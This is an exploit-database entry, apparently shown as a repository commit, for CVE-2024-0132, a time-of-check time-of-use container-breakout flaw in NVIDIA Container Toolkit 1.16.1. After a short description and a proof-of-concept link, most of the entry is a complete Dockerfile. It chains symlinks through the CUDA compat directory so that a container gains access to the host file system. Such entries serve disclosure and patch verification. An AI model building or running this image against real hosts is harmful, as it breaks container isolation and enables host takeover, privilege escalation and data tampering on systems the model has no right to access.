f33b83aeea
2 changes to exploits/shellcodes/ghdb NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)
44 lines
No EOL
1.4 KiB
Text
44 lines
No EOL
1.4 KiB
Text
# Exploit Title: Container Breakout with NVIDIA Container Toolkit
|
|
# Date: 17/02/2025
|
|
# Exploit Author: r0binak
|
|
#Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
|
|
# Version: 1.16.1
|
|
# Tested on: NVIDIA Container Tooklit 1.16.1
|
|
# CVE: CVE-2024-0132
|
|
|
|
Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a
|
|
Time-of-check Time-of-Use (TOCTOU) vulnerability when used with
|
|
default configuration where a specifically crafted container image may
|
|
gain access to the host file system. This does not impact use cases
|
|
where CDI is used. A successful exploit of this vulnerability may lead
|
|
to code execution, denial of service, escalation of privileges,
|
|
information disclosure, and data tampering.
|
|
|
|
PoC link: https://github.com/r0binak/CVE-2024-0132
|
|
|
|
Steps to Reproduce:
|
|
|
|
Build and run a docker image based on such a Dockerfile:
|
|
|
|
FROM ubuntu
|
|
|
|
RUN mkdir -p /usr/local/cuda/compat/
|
|
|
|
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
|
|
RUN echo test >
|
|
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
|
|
|
|
RUN mkdir -p /pwn/libdxcore.so.1337/
|
|
RUN ln -s ../../../../../../../../../
|
|
/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
|
|
|
|
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
|
|
|
|
RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
|
|
/usr/local/cuda/compat/libxxx.so.2
|
|
|
|
The host file system will reside in
|
|
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/
|
|
|
|
Regards,
|
|
Sergey `*r0binak*` Kanibor |